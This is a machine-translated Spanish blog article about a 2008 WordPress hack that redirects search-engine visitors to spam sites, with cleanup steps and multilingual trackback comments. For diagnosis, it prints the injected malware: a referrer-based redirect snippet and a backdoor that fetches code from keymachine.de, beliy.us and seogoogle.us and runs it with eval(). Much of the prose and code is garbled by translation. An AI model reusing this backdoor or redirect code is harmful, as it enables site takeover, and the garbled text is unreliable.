Corte de WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir a Your-Needs.info, a AnyResults.Net, a Golden-Info.net y a otros sitios ilegales
Los piratas informáticos están saliendo todos a cortar y explotar los blogs de WordPress recibidos por todas partes la tela, plantando e inyectando código malévolo en los códigos y la base de datos de WordPress para volver a dirigir visitantes y golpes de Google y de otro los motores de la búsqueda para spam sitios tales como your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us y muchos otros sitios del Spam de los cuales llenó pagar-por-chascan anuncios del CPC. AlguÌn corte aparece apuntar a una muchedumbre más grande volviendo a dirigir toda sin la galleta de WordPress. Sin cortado, éstos trafican supuesto para llegar el blog como destinación.
Síntomas del corte del cambio de dirección del Search Engine
Observe que no todos los síntomas pueden suceder en conjunto. Puede haber más de existió un método de cortes, que contribuyeron a diverso encontrar y a la resolución posible.
- Cualquier tecleo a través de los motores de la búsqueda tales como Google, Yahoo, AOL, MSN, resultados vivos de la búsqueda de Windows, incluyendo nombre del blog, será vuelto a dirigir y remitido a los sitios del pirata informático tales como your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, con la lista segura de crecer. El espectador llega la página del pirata informático con la misma secuencia de búsqueda que él o ella buscaba en Search Engine.
- Chasque encendido un acoplamiento al blog en lector de la alimentación de RSS tal como lector de Google puede ser vuelto a dirigir al sitio del pirata informático también.
- Volverán a dirigir a un visitante sin cuenta en el blog, o no la conexión (por lo tanto no hace hace la galleta detectar por código malévolo), para spam sitios.
- Solamente las visitas del Search Engine se vuelven a dirigir lejos, y el truco maneja engañar alrededor probablemente muchos bloggers, webmasters y dueños del sitio, o por lo menos retrasa la detección del problema.
- La gota enorme y dramática repentina y pierde de la cantidad masiva de visitantes trafica y pagina opiniónes en las estadísticas del perseguidor de la tela, especialmente tráfico con Google como referrer, aunque la clasificación de los resultados del Search Engine está intacta.
- Gota de Massic del ingresos por publicidad de Google el AdSense o la otra red de los anuncios, o comisiones del afiliado.
- El código codificado base64 siguiente del PHP puede aparecer en el archivo de wp-blog-header.php:
¿<? PHP \$seref=array (“google”, “msn”, “vivo”, “AltaVista”, “pide”, “yahoo”, “AOL”, “CNN”, “tiempo”, “alexa”);$ser=0; ¡foreach ($seref como $ref) si (strpos (strtolower ($_SERVER ['HTTP_REFERER']), $ref)! ¿==false) {$ser=” 1? ; rotura; }¿si ($ser==” 1? sizeof del && ($_COOKIE) ==0) {jefe (” localización: http://” .base64_decode (” YW55cmVzdWx0cy5uZXQ="). ”/"); salida; ¿}? > - Una imagen, que es de hecho un manojo de código malévolo del PHP, fue agregada al wp-contenido/al directorio de las cargas por teletratamiento. Por ejemplo, el wp-contenido/uploads/2008/06/06/abcdefghijklmn.jpg, o ella puede estar dentro de su carpeta del tema, es decir wp-contenido/temas/obra clásica/imágenes/xyz.jpg. El nombre de la imagen puede estar en el formato de xxxxxx_old.jpeg.
- Una entrada fue insertada en la base de datos de MySQL para que los wp_options de WordPress activen la imagen (el código malévolo del PHP) como enchufable, típicamente como rss_f541b3abd05e7962fcab37737f40fad8.
- Puede haber también códigos malévolos, especialmente los que interpretaron con comando eval () o de base64_decode () insertado en otros archivos del PHP de WordPress. Los ejemplos son los códigos siguientes:
si (isset ($_GET [“p”])) {$sock = @fsockopen ('km20725.keymachine.de', 80);si ($sock) {fwrite ($sock, `CONSIGUEN http://km20725.keymachine.de/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]. '′ HTTP/1.0. ” \ r \ n ");fwrite ($sock, anfitrión del `: ” \ r \ n \ r \ n de km20725.keymachine.de'. ");mientras que ($content [] = fgets ($sock));$content = implode (”, $content);@eval (ajuste (substr ($content, strpos ($content, “\ r \ n \ r \ n "))));fclose ($sock);}}si (isset ($_GET [“p”])) {@eval (@file_get_contents ('http://beliy.us/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]));}si (isset ($_GET [“p”])) {@eval (@file_get_contents ('http://seogoogle.us/server/index.php?host= '. $_SERVER [“SERVER_NAME”]. '&p='.$_GET [“p”]));}eval (gzinflate (base64_decode ( - El tema de WordPress se activa y se utiliza que se puede inyectar con cortar código y afectar también. Tal código existe normalmente en header.php o index.php del tema, y tiene una línea similar al abajo
si ($ser==” 1 sizeof del && del ″ ($_COOKIE) ==0) {jefe (” localización:
El tráfico de la búsqueda de WordPress vuelve a dirigir para spam el corte del sitio sucede probablemente debido al agujero de seguridad y a la vulnerabilidad que no se remienda cuando el dueño del blog decide no aumentar a la última versión de WordPress (aunque algunos informes que sus blogs cortado aunque está ya en la última versión de WordPress 2.5.1). Lo que la causa, aquí es el arreglo y la solución para resolver y para derrotar el corte para asegurarse de que usted posee detrás el tráfico y evite penalizado por Google por la reorientación desrazonable para spam las páginas.
- Respaldo la base de datos de WordPress.
- Utilice el phpMyAdmin para hojear las tablas de base de datos de WordPress MySQL. Van a la tabla de los wp_options, y después corrigen la fila nombrada los active_plugins. La fila detalla todos los enchufes activos se ha activado que. Pasan a través de la lista (en una línea), y buscan un enchufable nombrado terminado con una extensión de la imagen, tal como .jpg, .jpeg, .gif y etc. por ejemplo, abcdefgh_old.jpeg. Observe abajo de la trayectoria al archivo de imagen.
- Usando sFTP o SSH (olvide el ftp o el telnet para la seguridad), después navegue a la trayectoria del archivo, y suprima el archivo.
- Vaya al panel de los enchufes del administrador de WordPress, desactive o active enchufable para despejar del enchufable malévolo de la fila de los “active_plugins”.
- De nuevo a phpMyAdmin, en la tabla de los wp_options, encuentre una fila que contenga la secuencia siguiente como option_name:
rss_f541b3abd05e7962fcab37737f40fad8Suprima la fila ausente.
Si usted no sabe realizarse la limpieza de la base de datos detallada en pasos arriba, aquí es una clase particular video:
- Vaya a la tabla de los wp_users. Si hay un usuario sin nombre (valor nulo en campo del user_nicename) creado en el 00:00: 00 en 0000-00-00, nota abajo de la identificación del usuario (campo de la identificación, un número). Suprima al usuario.
- Hojee la tabla del wp_usermeta. Localice todas las filas con los fósforos del user_id la identificación del usuario ilegal suprimido. Hay normalmente tres filas asociado a la identificación del usuario del invasor. Suprima todas las filas asociadas.
- Ábrase una sesión al servidor para corregir los archivos del tema, u hojee el código de los archivos del tema en el redactor del tema del panel del diseño del administrador de WordPress. Compruebe el header.php y el index.php para saber si hay cualquier código sospechoso. Según lo mencionado anteriormente, busque algo similar a la línea abajo:
si ($ser==” 1 sizeof del && del ″ ($_COOKIE) ==0) {jefe (” localización:Si está encontrado, suprima y quite el código. Observe que el código malévolo será varias líneas de largo en total.
- Si no se existe ya, cree un archivo vacío de index.html en el wp-contenido/el directorio de los enchufes. index.html en blanco oculta el contenido del directorio de los enchufes, blinda con eficacia qué enchufes utilizado de piratas informáticos para endurecer y para apretar la seguridad de WordPress.
- Cargue y substituya los archivos de cada WordPress (no sólo wp-blog-header.php) en el servidor por versión fresca, limpia, y de la original la última de WordPress (por supuesto, excepto pocos archivos tales como wp-config.php y temas). Si usted está aumentando, lea la guía cuidadosamente.
- Cambie su contraseña.
- Si usted tiene usuarios múltiples, cambie el suyo contraseña (o pídalo para cambiar la contraseña) también.
IMPORTANTE: La página es traducida por computador y con tal que “como está” sin garantía. La traducción automática puede ser difícil de entender. Refiera por favor al artículo inglés original siempre que sea posible.
Artículos relacionados
- Integre y exhiba Google AdSense para la búsqueda y los resultados de encargo del Search Engine del tonel en el blog de WordPress paginan la plantilla
- Substituya la búsqueda del blog de Google por Technorati para los acoplamientos entrantes en el tablero de instrumentos de WordPress
- StatTraq - Wordpress enchufables para la estadística del sitio y el contador del tráfico
- Este sitio puede dañar su computadora en cada los sitios desinsecta en resultados de la búsqueda de Google
- Corte para buscar y para ver libremente el webcam vivo con la búsqueda de Google
- ¿Wikiasari - Digg o StumbleUpon del tonel de Google Search Engine de encargo, para Wikipedia?
- WordPress enchufable: Exhibición Google Analytics y estadísticas de los informes de FeedBurner del sitio Admin
- Sistema completo de la insignia Collection (1998 - 2007) del día de fiesta del Search Engine de Google
- Cómo reajustar la contraseña de WordPress para recuperar secreto olvidado










































6 de junio de 2009 23:36
Corte de [...] WordPress: Recupere y fije [...]
19 de mayo de 2009 20:22
Wordpressnya de la actualización del terus del lupa de Jangan, bolong enchufable del ada del suka de yang del terutama.
12 de diciembre de 2008 17:03
Corte de [...] Переводстатьи WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir a Su-Nee… [...]
21 de noviembre de 2008 13:25
Apenas estoy saliendo de este problema.
Mi wp-blog-header.php fue cargado con el código de los desperdicios que volvía a dirigir todo el Search Engine lejos de mi sitio. Tenía tráfico CERO del Search Engine por cuatro días.
wp-blog-header.php, que es realmente 1KB, fue cargado con 19KB del código malévolo. Apenas la limpieza de él no será suficiente, tampoco, porque el archivo viejo no permite el sobreescribir o el suprimir. Tuvo que ocuparse vanamente alrededor con permisos.
Gracias por este poste que lanzó una cierta luz adicional en mi situación.
¡Estoy realmente así que paranoico ahora que incluso no quiero mencionar el nombre de mi Web site aquí!
31 de octubre de 2008 11:53
ini del masalah del nanggulangin del buat del lengkapnya del lebih del cara de [...], disini del aja del baca. [...]
25 de julio de 2008 09:49
el merda del una del avere de [...] viene quella tra le mani. Infestati o pensate di esserlo, utili del stati del già del siete del SE del consigli del alcuni del dell'exploit e del qui e qui troverete le specifiche por [...]
17 de julio de 2008 10:30
Corte de [...] WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir a Su-Nee…. [...]
15 de julio de 2008 08:10
[...] I lo cogió a principios de y se cercioró de quitar todo el código malévolo. Aquí está la clase particular agradable en cómo limpiar su sitio si ésta era suceder a [...]
3 de julio de 2008 03:08
buba del unde e del sema del dau de [...] Ca sa-MI, cafea del la del discutie de la introducción de Eugen del spus de NU MI-AR fi del daca, Ca un vad de la sal del bine de Google si AR fi del PE del acoplamiento de la O.N.U del gasit. MyDigitalLife.info, titlul del Cu del articol de la O.N.U del publicat del au: [...]
18 de junio de 2008 22:08
[...] Mi vida de Digitaces - corte de WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico Redi de la galleta… [...]
13 de junio de 2008 13:36
Corte de [...] WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir - mi Digita… Corte de WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir a Your-Needs.info, a AnyResults.Net, a Golden-Info.net y a otros sitios ilegales ” mi vida de Digitaces (etiquetas: seguridad) de los wordpress [...]
13 de junio de 2008 12:00
[...] Mi vida de Digitaces - corte de WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico Redi de la galleta… [...]
12 de junio de 2008 19:40
El kita de la palabra clave del untuk del tetap de di Google del kita de WordPress del blog del peringkat de [...] Kalau, drastis del turun del pengunjung del tapi, hati-hati, di de dan del corte del kena del kita del blog del artinya del itu del jadi del bisa vuelve a dirigir Spam del situs de KE. [...]
12 de junio de 2008 14:43
Corte de [...] WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico de la galleta vueltos a dirigir a Su-Nee… Comparta o envíe esto a la esfera de los amigos: ¿ContentWant relacionado más revisiones del software de la tela? ¡Entonces cerciórese de le para suscribir a nuestra alimentación de RSS o para conseguir nuestro aparato adaptable y para encajarlo en su sitio! Postes relacionados WordPress - el software más usado [...] del blog abierta de la fuente
12 de junio de 2008 11:14
jakieś del na del narażona del była del WP 2.5.1 del wersja de [...] problemy. Un zamieszaniu del tym del całym de w, corte del cambio de dirección del Search Engine del już del zwanym, wyszukiwarek del ruchu z del przekierowanie del chodzi o, głównie Google, tylko del nie del choć, specjalnie [...] del na
12 de junio de 2008 10:06
[...] Mi vida de Digitaces - corte de WordPress: Recupere y fije Google y Search Engine o ninguÌn tráfico Redi de la galleta… [...]